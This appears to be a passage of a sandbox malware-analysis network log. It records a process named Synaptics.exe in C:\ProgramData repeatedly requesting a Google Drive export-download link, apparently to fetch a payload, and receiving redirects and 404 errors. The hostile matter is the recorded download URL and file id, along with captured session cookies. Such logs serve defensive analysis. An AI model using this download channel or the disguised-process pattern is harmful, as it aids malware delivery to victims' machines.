                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:40 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-WuPte8BSiBUZM7b3U4OdDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:40 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:40 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="YO1kKkrn4e-Dc1N6L3QlCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:40 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    49 | 192.168.2.9 | 49800 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:40 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GG50B5bNv6sgXACql__W2PXcKZPl7tvWh7yCyN5O4G1FTVXRl9DITtg7F0NDTb1C9t5S152i_ICLfAe1H2fxnTJ8JrEDVAVRPZae_sL_6AH5SaTjnPk2h4AqLCoE5njkS2pPKExFaP_qi_kRcBh1BP4swSFF2VSB0u2jDSWnNsXH-zRVFWAAOxkC


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    50 | 192.168.2.9 | 49801 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:40 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:41 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6s-smCQ2SFdiS79T0-Ml63D3J7vPBoZHg5H51upU3KPsEyt0nZLwxm2HA-WKo_PEAn
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:40 GMT
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-hMGxaJ4cc4xrVKianJBeGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:41 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:41 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="hTQGtVuItzmAW5zjYNlacw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:41 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    51 | 192.168.2.9 | 49802 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:40 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                                                                                                                    2024-12-30 10:25:41 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:40 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-fAwoJw2cvzNLrx0udT3LdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    52 | 192.168.2.9 | 49804 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:41 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                                                                                                                    2024-12-30 10:25:41 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:41 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-hIJVtt6jCeEuRcWJmNP_4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    53 | 192.168.2.9 | 49806 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:41 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:42 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4P9dcb7zks9tzVGlzBslFDu6BY9eKd5ugppUK_SfkWdjlEfBfxKotPXYzIVfordHgI
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:41 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-mFVecKSr9t1hr-4WwhYNCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:42 UTC | 147 | IN
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:42 UTC | 1390 | IN
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="62Gue7v0cARzca-bLlVJ6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:42 UTC | 115 | IN
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.9 | 49807 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:41 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
2024-12-30 10:25:42 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:42 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-MDMaCh0CHMcsZ2BWIIkCvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.9 | 49809 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:42 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
2024-12-30 10:25:42 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:42 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-PwUsqQq_so9XQjMMvbsgcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.9 | 49808 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:42 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:43 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC65jHHTHh9eGjuIguwqO6r9vMh8tKJyuafVV16hH_xhzg1rpKmMxk3ig1CSd65hA4fOEEDosaA
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:42 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-i5yUbJkJkp540OPeLVqMnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:43 UTC | 140 | IN
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:43 UTC | 1390 | IN
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="tUww7GtbqSwLep3pirr8Og">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:43 UTC | 122 | IN
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.9 | 49812 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:43 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
2024-12-30 10:25:43 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:43 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-8-ALrRVUVPanVHnLawmMng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.9 | 49811 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:43 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:43 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6lEiPWnEutgnpaJ-M4i2D5Tj9vFe-mE9RkRX4dlnLgyXYbjCQc28rEzi2ZhwbVNLJolkFpow4
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:43 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-s3x3kMhVWRMJKk_KoXwoiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:43 UTC | 140 | IN
